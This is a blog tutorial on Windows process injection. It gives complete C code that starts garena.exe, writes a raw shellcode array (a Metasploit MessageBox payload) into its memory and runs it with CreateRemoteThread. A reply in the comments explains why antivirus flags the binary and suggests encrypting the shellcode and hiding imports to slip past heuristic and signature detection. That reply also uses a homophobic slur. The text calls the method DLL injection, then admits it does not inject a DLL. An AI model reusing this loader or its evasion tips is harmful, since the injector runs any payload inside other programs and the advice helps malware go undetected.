Dll Injection +1
Programming never hurts here or there!
So lets learn a method by which we can execute our own arbitary code into other process's context.
To understand the concept you have to understand what exactly executable code is.
Under windows there are many extensions which we may have came across but never used.
The code at its most basic level is just a simple BYTE from 0x00 to 0xFF. i.e. 0-255
a simple representation of ExitProcess(0); in C language is actually very different in real machine code which we will be using in this experiment.
in C
#include
int main()
{ExitProcess(0);}
in machine lingua
xor eax,eax
push eax
mov eax,[ExitProcess]
call eax
each line represents different set of instructions
which can be formed as 0x33 0xc0 0x50 0xB8 0xFD 0x98 0xE7 0x77 0xFF 0xD0,
this is its pure form is a code for calling exitprocess api of windows which can terimate any process, should it be called from any process's context.
Now we have our resources, we require a little bit knowledge on different type of files.
.cpl control panel extension
.exe portable executable
.dll dynamic link library
.ocx Visual basic library
.sys system driver
.scr screensaver file
.drv driver
what we are concerned about here is .dll and .exe
theory
using dev-CPP which is an open source C++ compiler
we will create a sample dll which prints helloworld message.
dll name = sample.dll
then to inject that dll into another process's context means
Creating the process in suspended state
allocating memory of 11bytes
write in it "sample.dll"
then create thread on target process.
in practice:
then Create a source file in dev-CPP
write this
#include
#include
#include
BOOL WriteProcessBytes(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize)
{
DWORD dwOldProtect;
BOOL boolReturn = FALSE;
if(hProcess == NULL)
{
VirtualProtect(lpBaseAddress, nSize, PAGE_EXECUTE_READWRITE, &dwOldProtect);
boolReturn = ((memcpy(lpBaseAddress, lpBuffer, nSize))? 1 : 0);
VirtualProtect(lpBaseAddress, nSize, dwOldProtect, &dwOldProtect);
}
else
{
VirtualProtectEx(hProcess, lpBaseAddress, nSize, PAGE_EXECUTE_READWRITE, &dwOldProtect);
boolReturn = WriteProcessMemory(hProcess, lpBaseAddress, (LPVOID)lpBuffer, nSize, 0);
VirtualProtectEx(hProcess, lpBaseAddress, nSize, dwOldProtect, &dwOldProtect);
}
return boolReturn;
}
int main()
{
BYTE shellcode[]="\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2"
"\x77\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c"
"\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff"
"\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b"
"\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01"
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
"\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45"
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c"
"\x6c\x20\x41\x68\x33\x32\x2e\x64\x68\x75"
"\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d"
"\xbc\x87\x1c\x24\x52\xe8\x61\xff\xff\xff"
"\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24"
"\x0a\x89\xe3\x68\x58\x20\x20\x20\x68\x4d"
"\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9"
"\x88\x4c\x24\x10\x89\xe1\x31\xd2\x52\x53"
"\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
HANDLE hProcess; //** Will be the process we inject
HMODULE hKernel; //** Will hold Kernel module
LPVOID lpExecString, lpLoadLibraryAddr; //** Remote string and LoadLibrary() address holder
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
CreateProcess(NULL,"C:\\Program Files (x86)\\Garena\\garena.exe", NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL,&si,&pi); //** Attempt to gain access to user-defined process
// ResumeThread(pi.hThread);
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId);
if(hProcess == INVALID_HANDLE_VALUE) //** Error
{
return FALSE;
}
lpExecString = (LPVOID)VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if(lpExecString==NULL){return 0;}
if(WriteProcessBytes(hProcess, (LPVOID)lpExecString, shellcode, sizeof(shellcode)) == FALSE)
{return FALSE;
}
HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpExecString, NULL, 0, NULL);
ResumeThread(pi.hThread);
CloseHandle(hProcess);
return TRUE;
}
then run the file. as stated in Createprocess api garena.exe will start running and a thread will also run in context of it which will print a hello world messageBox
in above code we havent used any form of dll injection because i got hold of raw machine code which could be written in the process and thread be started from its shellcode[0]'th position.
this technique could be used to run custom code under another process.
Posts
2 comments:
nice work::
under win7 it's not working
in winxp .it displays a nice msgbox:hello from msf!
kaspersky detecting it as some backdoor...
the shellcode, i think is actually a messagebox api loaded dynamically through loadlibrary and getprocaddress
http://imageshack.us/photo/my-images/695/clarifyj.jpg/
this should clarify everything.
you might have made some changes in the Code(not shellcode)
as for kaspersky detecting it, Createremotethread api is called directly thus making an entry in import section of Executable which will allow kaspersky heuristics detector to flag it as backdoor.
also providing shellcode directly in Code is *flaggy* as well as *faggy* due to no encryption any heur. detection system will directly emulate assembly instructions in shellcode without even running the binary to check what exactly it is running. its like having a function load all libraries and check manually the adddress of Messagebox in user32.dll without even encrypting and not calling this function. as a result signature based detection took place.
i hope this will do clear everything.
Team Hack-a-Holic
Post a Comment